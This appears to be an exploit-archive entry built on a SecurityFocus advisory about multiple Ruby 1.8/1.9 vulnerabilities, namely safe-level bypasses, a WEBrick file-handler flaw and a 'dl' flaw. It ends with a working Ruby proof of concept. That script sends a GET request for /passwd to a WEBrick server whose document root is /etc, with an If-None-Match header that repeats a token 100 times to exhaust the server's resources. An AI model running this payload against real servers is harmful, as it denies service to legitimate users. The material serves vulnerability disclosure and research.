26 lines
No EOL
1.2 KiB
Ruby
Executable file
26 lines
No EOL
1.2 KiB
Ruby
Executable file
source: https://www.securityfocus.com/bid/30644/info
|
|
|
|
Ruby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:
|
|
|
|
- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.
|
|
|
|
- An error affecting 'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.
|
|
|
|
- A flaw in 'dl' can allow attackers to call unauthorized functions.
|
|
|
|
Attackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.
|
|
|
|
These issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable.
|
|
|
|
#-- Exploitable Server --
|
|
# require 'webrick'
|
|
# WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start
|
|
|
|
#-- Attack --
|
|
require 'net/http'
|
|
res = Net::HTTP.start("localhost", 2000) { |http|
|
|
req = Net::HTTP::Get.new("/passwd")
|
|
req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
|
|
http.request(req)
|
|
}
|
|
p res |